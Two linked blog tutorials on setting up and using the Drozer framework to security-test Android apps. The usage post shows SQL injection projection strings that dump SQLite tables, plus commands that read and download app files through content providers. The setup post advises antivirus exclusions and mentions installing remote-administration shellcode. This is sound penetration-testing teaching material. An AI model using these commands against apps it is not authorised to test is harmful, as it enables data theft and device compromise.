Categories
Cyber Security Mobile App Testing

Android App Hacking with Drozer – Usage

This is the article for those of you who have already previously setup Drozer or are returning to test your next Application a few weeks later and do not quite remember the exact syntax to get Drozer purring.

Reconnecting Drozer – Quickstart

Instead of heading back to the last article on setting up Drozer completely here is the quick start to get back online.

  1. Boot Up your Genymotion Device which has the Drozer agent installed, pull it up and turn it on (bottom right hand corner)
  2. Now pull up a console (command line) and change your directory over to your platform-tools folder.
  3. Type adb forward tcp:31415 tcp:31415 to begin using the correct ports required for Drozer
  4. Switch your directory to your drozer folder and then type drozer console connect and you are back in business

 

Examining Mobile Web Applications w/ Drozer:

drozer list 2

At this point in time I want you to type the command list this is going to demonstrate all of the modules available for you to execute in this session much like the -h or –help command would get you a list of sample syntax that can be used.

drozer app packages

The next command is finding the application package for the APP you are testing.

run app.package.list -f (name of app or company)I have given you a few examples above, this will search for the application package which we will be running additional commands for.  As you can see a search for google pulls up a significant amount of applications, fortunately Drozer puts the (App Name) in brackets so it is very easy for you to identify your application even if you are testing a few at the same time.

For this test I will be using Etar which is an open source calendar application which I have already run these commands on and there are no shown vulnerabilities with this tools  (demonstrating code) as I have already found the application package I will be using.

**Disclosure: Please only be testing applications which you have either written permissions from individuals with authority to test and application, is documented as Open Source (express permissions given – static testing only), or is your own proprietary application in which you are testing for vulnerabilities.

If needed here are the links for SOW (Statement of Work) and ROE (Rules of Engagement) which are highly recommended when working on any penetration testing efforts.

Next, find out some more information on the app you will be looking at first.

run app.package.info -a (application) use the location found in the screenshot above, in my example it was the ws.xsoh.etar  – see below.

drozer app info

As you can see above, the version number is listed, the path, the .apk file, permissions and typically a broadcast receiver would define the permissions(when its supported by a private company).

You should be Screen shooting this data and save them as artifacts when submitting your testing documentation (and for your own reference so you do not have to run these commands again)

If you need to pull an .apk for any reason please see the article already written in regards to MobSF (Mobile Security Framework) where extracting .apk files is documented.

Attack Surfaces

run app.package.attacksurface (application)

This command will get you into territory which has made Drozer so popular in the mobile web application security world.  Lets take a look.

attack surface

As we can see here, there are 7 activities which have been exported along with 3 broadcast receivers.  Now as security testers it is up to us to make sure that these exported activities and attack surfaces are sensitive and/or vulnerable by design.  If they are vulnerable we can take it a step further and use the other Drozer modules to test and exploit these activities.

Be aware and on the lookout for a line that may be included at the bottom of this attack surface result:

debuggable

As security testers this is big.  First and foremost this is most likely an item on your Mobile web application security checklist in which case if you do not see this output, most likely this application is not in Dev mode and has been released appropriately and is in Prod state.

So what does it mean if you do see that this application is debuggable?  Good question.

When an application is debuggable it means that the development team did not turn this “feature” off, it also means that as a penetration tester we are able to take our pick of debuggers attach it to the process and walk through every single set of instructions while executing arbitrary code in the application (good times).  InfoSec institute has an excellent article on digging deeper when you application is debuggable and injecting runtime code.

run app.activity.info -a (application)

etar activities

As you can see in this open source application which is the new free software for android calendar it is using basically all code from the com.android.calendar packages which is why I chose this application.

When using this next command, look for something that was custom written by the creators.  Something that is unique to the app in particular that is either a standalone activity or an activity behind any type of authentication page in which the application can be taken advantage of.  You would be amazed at some of the things you can discover, Password Lists, Usernames, developer documentation, just remember to Document Everything.

run app.activity.start --component (application) (activity)

interacts

Run each activity, witness how it interacts with your application, change parameters, share items, change settings, and see what can be seen and changed within your mobile web application.

Many times the app.service.send can be used to send messages to each individual service, other times it may take writing customer drozer modules as well to truly get the outputs you are looking to get from your Mobile Web Application

 

 

Digging Deeper ~

Drozer is capable of building more complex commands on top of just picking activities and running them within the application.  you can also type

help

in front of your command and see what options are available to you

run app.activity.start --component (application) (activity)

help - Copy

Here we can see that we can continue to use Drozer with a much more ‘explicit intent’ by using optional arguments provided within the help command documentation.

optional args - Copy

 

While there is not much to see on my sample application using these next few commands it is very important that you continue to analyze the application you are testing with these as I am sure there will not only be content, but possible vulnerabilities and findings as well.

 

Content Provider Information

run app.provider.info -a (app)

~This will list content provider information – please run this as while you may not have found a vulnerability within the application itself I have seen a number of times where there are significant vulnerabilities or SQL injection flaws within the content providers of the Mobile App.

Drozer Scanner Module

Also Drozer is able to search for SQL Injection with its scanner module but for directory traversal as well.

run scanner.provider.injection -a (app)

run scanner.provider.traversal -a (app)

Run these to find vulnerable content providers that are easily visible to the scanner.

run scanner.provider.finduris -a (app)

This scanner module will allow you to bring together a list of content URI’s that are accessible and then we are able to take a look and try to retrieve and query information from the URI’s or possibly modify data in any correlating databases.

run app.provider.query content://(content provider as seen in previous command output here)

Now we have data, but how to test it?

Here is where you direct knowledge of Android comes into play.

We know that the Android platform is big on using SQLite databases for storing snippets, metadata, and user data.  Since we know these data bases use SQL, we know that SQL injection is right around the corner.  If you don’t know SQL, you can learn enough in a day off of CodeCademy to be dangerous with it.

Here are a few exploit examples testing for SQL vulnerabilities

run app.provider.query content://(content provider) --verticle_id: 1

Looking at certain id’s within the database

run app.provider.query content://(content provider) --projection "'"

Testing the projection field

run app.provider.query content://(content provider) --selection "'"

Testing the Selection field.

run app.provider.query content://(content provider) --projection "* FROM SQLITE_MASTER WHERE type='table';--"

Use any error messages received to craft your requests to tray to list all tables or query specific tables

run app.provider.query content://(content provider) --projection "* FROM Key;--"

Underlying File Systems

These content providers are in place in order to share data, files, and information to other applications outside of the application in which you are using.  This is called sand-boxing.  There are a number of commands you can use within drozer that I will list in a second, but I personally use Root Browser to dig deeper into the filesystem of the application, and if I require a file I can use drozer to download it if I prefer.

to make sure you have the right file, read it

run app.provider.read content://(content provider)/data/data/(filename)

then download it.

run app.provider.download content://(content provider)/data/data/(filename)

 

Wrap up ~

It is important to remember that you do not have to memorize EVERYTHING!  You just have to know where to find it.  If you ready this whole article awesome.  If you put to use the information delivered in this article, even better!

Personally I hack to learn.

Since I do plan to stop learning, I will definitely not stop Hacking!

I hope you do the same.

Hack On.

Cyber Incision Out.

 

 

 

 

 

Categories
Cyber Security Mobile App Testing

Android App Hacking with Drozer – The Setup

 

Why Drozer?

 

MWR Labs has done an excellent job putting together this attack framework for Android Applications, Drozer Rocks.  They even have an excellent tutorial to help you get everything setup, what I found myself doing when I first learned how to use this tool was still needing other resources in order to complete my setup and get things working, here we bring it all together and get you up and running.

This tool helps analyze attack surfaces and display any attack surfaces in which Android applications have, and allow you to then use public exploits against the applications to make sure that your application has been tested and Validated!

This tool can also be used for Remote Exploits, when a shell is obtained, install the shellcode that Drozer generates, and now you have a remote administration tool on your target device.

You should need no other convincing than this that this tool needs to be in your suite of Android testing Tools right next to Mobile Security Framework (MobSF), Burp, and AndroidStudio.

Setup and Install~

 

First boot up Genymotion (instructions to load this tool are in the MobSF article posted here)  Pick an android device to emulate which is running anything after Android 2.1 and have your application downloaded from the Google Play Store (or sideloaded).

 

To begin head over to Team androids Page and Download the latest Google Drivers available and unzip them into your Mobile Web App Folder (or one that you will remember) Then right click your command console and run as an administrator.  We need to set our path to this folders location in order to use ADB at the command line.

chdir "C:\Desktop\FOLDER\Platform-Tools\"  Replace the words within the quotes to the files location on your workstation when running.

adb devices

In order to run the ADB command in the console you must be in the platform tools folder, this is important to note as the next thing we need to do is install the Drozer agent onto your genymotion device.

Side Note*** If using a physical android device please continue installing to Google USB Drivers onto your computer shown in the Team Android Post then connect the device to your workstation with a USB cable.

Then type adb devices as shown above in the screen capture.

this will pop up a list of the android devices which you have connected either via USB cable or via Genymotion Android Emulator

Building for Windows

NOTE: Windows Defender and other Antivirus software will flag drozer as malware (an exploitation tool without exploit code wouldn’t be much fun!). In order to run drozer you would have to add an exception to Windows Defender and any antivirus software.

We must also have python on our device as it is one of the dependencies of being able to use the Drozer toolset.

git clone https://github.com/mwrlabs/drozer/
cd drozer
python.exe setup.py bdist_msi

Installing .msi (Windows)

Run dist/drozer-2.x.x.win-x.msi 

**As you download this file, Windows Defender should catch it, back click on the alert and add the entire Folder as an exception to Windows Defender and Firewall in order to proceed.

Agent.APK Setup

Now download the Drozer agent.apk file here (this will be installed on your Android device so it can communicate back to the Drozer program on your workstation).

Stay in your platform tools folder so you can run this adb command and install it onto your Android device using the following command:

adb install "C:\Desktop\FOLDER\Drozer\agent.apk" Once again please replace with Your download location of the agent.apk file.

adb install agent.apk

You should then see the orange Drozer agent application symbol on your device.  finally forward your ports to the ports that Drozer uses with the following adb command:

adb forward tcp:31415 tcp:31415

drozer setup

Here you can see the setup I am using.  In Genymotion I have been using Google Nexus 9 – 5.1.0 API 22 devices with a screen size of 1536×1048.

I  find that I like the bigger screen size when working in Geny and it fills exactly half of my UHD display.

drozer agent on

 

Now, click your Drozer agent icon, and in the bottom right hand corner click the “off” button to turn it on.

 

Boom congratulations, you have now setup Drozer and are read to begin testing your Android Application.  Install it off of the Google Play store or sideload it into your Genymotion device, then head back to your command line.

You will navigate over to your Drozer folder which has all of the program files within it and run:

drozer console connect

***On a real(not an emulator) android device the ip of the device must be specified drozer.bat console connect --server 192.168.0.9

drozer running

If you are already knowledgeable on the inner workings of Android Testing Tool Drozer, hack on.  If not follow me on over to my next post.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

In this article we jumped between three main articles, none of these will get you completely setup by themselves unfortunately which is why I am here to put all the steps together into this one article and be your one stop shop here at Cyber Incision.

  • The first being from Team Android who is going to get you up and running with fastboot, ADB (<—gotta have it), and Fastboot onto Windows 10
    • This set of drivers is also known as the Android SDK Tools (Follow this link to set this up) which is an advanced command line tool which will allow you to run operations on your Android Device and Emulator that would not have been possible before.
  • The Second Article worth reading is from the INFOSEC Institute which has provided an excellent introduction to Drozer, and can be used as a reference for many of the commands you will see here in this article
  • Finally is the MWR Drozer instructions manual which is an excellent reference point especially once you get past the introductory learning curve and begin using the Drozer modules.